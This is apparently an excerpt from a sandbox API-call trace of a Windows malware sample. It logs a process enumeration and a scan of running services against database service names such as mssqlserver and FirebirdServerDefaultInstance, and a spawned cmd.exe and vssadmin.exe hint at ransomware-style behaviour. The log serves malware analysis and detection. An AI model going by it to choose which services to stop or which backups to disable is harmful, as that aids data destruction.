	[0048.668] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0048.669] lstrlenW (lpString="lsm.exe") returned 7
	[0048.669] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0048.669] lstrlenW (lpString="svchost.exe") returned 11
	[0048.669] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0048.670] lstrlenW (lpString="svchost.exe") returned 11
	[0048.670] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0048.670] lstrlenW (lpString="svchost.exe") returned 11
	[0048.670] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0048.671] lstrlenW (lpString="svchost.exe") returned 11
	[0048.671] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0048.671] lstrlenW (lpString="svchost.exe") returned 11
	[0048.671] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0048.672] lstrlenW (lpString="audiodg.exe") returned 11
	[0048.672] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0048.672] lstrlenW (lpString="svchost.exe") returned 11
	[0048.672] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0048.673] lstrlenW (lpString="svchost.exe") returned 11
	[0048.673] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0048.673] lstrlenW (lpString="dwm.exe") returned 7
	[0048.673] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0048.674] lstrlenW (lpString="explorer.exe") returned 12
	[0048.674] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0048.674] lstrlenW (lpString="spoolsv.exe") returned 11
	[0048.674] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0048.675] lstrlenW (lpString="taskhost.exe") returned 12
	[0048.675] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0048.675] lstrlenW (lpString="svchost.exe") returned 11
	[0048.675] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0048.675] lstrlenW (lpString="taskeng.exe") returned 11
	[0048.676] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0048.676] lstrlenW (lpString="taskhost.exe") returned 12
	[0048.676] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="encoding hanging.exe")) returned 1
	[0048.676] lstrlenW (lpString="encoding hanging.exe") returned 20
	[0048.676] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="python tragedy.exe")) returned 1
	[0048.677] lstrlenW (lpString="python tragedy.exe") returned 18
	[0048.677] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="talent-mastercard.exe")) returned 1
	[0048.677] lstrlenW (lpString="talent-mastercard.exe") returned 21
	[0048.677] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="computers.exe")) returned 1
	[0048.678] lstrlenW (lpString="computers.exe") returned 13
	[0048.678] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="separated.exe")) returned 1
	[0048.679] lstrlenW (lpString="separated.exe") returned 13
	[0048.679] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="disks executives interval.exe")) returned 1
	[0048.679] lstrlenW (lpString="disks executives interval.exe") returned 29
	[0048.679] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="darkness.exe")) returned 1
	[0048.680] lstrlenW (lpString="darkness.exe") returned 12
	[0048.680] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="crafts-distinct.exe")) returned 1
	[0048.680] lstrlenW (lpString="crafts-distinct.exe") returned 19
	[0048.680] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sophisticated.exe")) returned 1
	[0048.680] lstrlenW (lpString="sophisticated.exe") returned 17
	[0048.681] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wishlist.exe")) returned 1
	[0048.681] lstrlenW (lpString="wishlist.exe") returned 12
	[0048.681] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="top.exe")) returned 1
	[0048.681] lstrlenW (lpString="top.exe") returned 7
	[0048.681] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="implemented.exe")) returned 1
	[0048.682] lstrlenW (lpString="implemented.exe") returned 15
	[0048.682] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="comp.exe")) returned 1
	[0048.682] lstrlenW (lpString="comp.exe") returned 8
	[0048.682] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="synthetic_memphis.exe")) returned 1
	[0048.683] lstrlenW (lpString="synthetic_memphis.exe") returned 21
	[0048.683] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solved.exe")) returned 1
	[0048.683] lstrlenW (lpString="solved.exe") returned 10
	[0048.683] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bosnia resolution.exe")) returned 1
	[0048.684] lstrlenW (lpString="bosnia resolution.exe") returned 21
	[0048.684] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trips.exe")) returned 1
	[0048.684] lstrlenW (lpString="trips.exe") returned 9
	[0048.684] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tumormanual.exe")) returned 1
	[0048.685] lstrlenW (lpString="tumormanual.exe") returned 15
	[0048.685] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x494, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="telecom.exe")) returned 1
	[0048.685] lstrlenW (lpString="telecom.exe") returned 11
	[0048.685] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="realistic.exe")) returned 1
	[0048.686] lstrlenW (lpString="realistic.exe") returned 13
	[0048.686] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0048.686] lstrlenW (lpString="WmiPrvSE.exe") returned 12
	[0048.686] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0048.687] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0048.687] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x934, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0048.687] lstrlenW (lpString="cmd.exe") returned 7
	[0048.687] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0048.688] lstrlenW (lpString="conhost.exe") returned 11
	[0048.688] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x948, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1
	[0048.688] lstrlenW (lpString="vssadmin.exe") returned 12
	[0048.688] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1
	[0048.688] lstrlenW (lpString="VSSVC.exe") returned 9
	[0048.689] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0048.689] lstrlenW (lpString="svchost.exe") returned 11
	[0048.689] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0048.690] CloseHandle (hObject=0x184) returned 1
	[0048.690] Sleep (dwMilliseconds=0x1f4) 
	[0050.039] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x7e0fcc0
	[0050.066] EnumServicesStatusExW (in: hSCManager=0x7e0fcc0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 0
	[0050.075] GetLastError () returned 0xea
	[0050.075] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x12c6) returned 0xb54b838
	[0050.075] EnumServicesStatusExW (in: hSCManager=0x7e0fcc0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb54b838, cbBufSize=0x12c6, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb54b838, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 1
	[0050.076] CloseServiceHandle (hSCObject=0x7e0fcc0) returned 1
	[0050.076] lstrlenW (lpString="Appinfo") returned 7
	[0050.076] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0050.076] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0050.076] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0050.076] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0050.076] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0050.076] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0050.076] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0050.076] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0050.076] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0050.076] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0050.076] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0050.076] lstrlenW (lpString="AudioSrv") returned 8
	[0050.076] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0050.076] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0050.076] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0050.076] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0050.076] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0050.076] lstrlenW (lpString="BFE") returned 3
	[0050.076] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0050.076] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0050.076] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0050.076] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0050.076] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0050.076] lstrlenW (lpString="CryptSvc") returned 8
	[0050.076] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0050.076] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0050.077] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0050.077] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0050.077] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0050.077] lstrlenW (lpString="CscService") returned 10
	[0050.077] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0050.077] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0050.077] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0050.077] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0050.077] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0050.077] lstrlenW (lpString="DcomLaunch") returned 10
	[0050.077] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0050.077] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0050.077] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0050.077] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0050.077] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0050.077] lstrlenW (lpString="Dhcp") returned 4
	[0050.077] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0050.077] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0050.077] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0050.077] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0050.077] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0050.077] lstrlenW (lpString="Dnscache") returned 8
	[0050.077] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0050.077] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0050.077] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0050.077] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0050.077] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0050.077] lstrlenW (lpString="DPS") returned 3
	[0050.077] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0050.077] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0050.077] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0050.077] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0050.077] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0050.077] lstrlenW (lpString="eventlog") returned 8
	[0050.078] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0050.078] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0050.078] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0050.078] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0050.078] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0050.078] lstrlenW (lpString="EventSystem") returned 11
	[0050.078] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0050.078] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0050.078] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0050.078] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0050.078] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0050.078] lstrlenW (lpString="gpsvc") returned 5
	[0050.078] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0050.078] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0050.078] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0050.078] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0050.078] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0050.078] lstrlenW (lpString="iphlpsvc") returned 8
	[0050.078] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0050.078] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0050.078] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0050.078] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0050.078] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0050.078] lstrlenW (lpString="LanmanServer") returned 12
	[0050.078] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0050.078] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0050.078] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0050.078] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0050.078] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0050.078] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0050.078] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0050.078] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0050.078] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0050.078] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0050.079] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0050.079] lstrlenW (lpString="lmhosts") returned 7
	[0050.079] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0050.079] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0050.079] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0050.079] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0050.079] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0050.079] lstrlenW (lpString="MMCSS") returned 5
	[0050.079] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0050.079] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0050.079] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0050.079] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0050.079] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0050.079] lstrlenW (lpString="MpsSvc") returned 6
	[0050.079] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0050.079] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0050.079] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
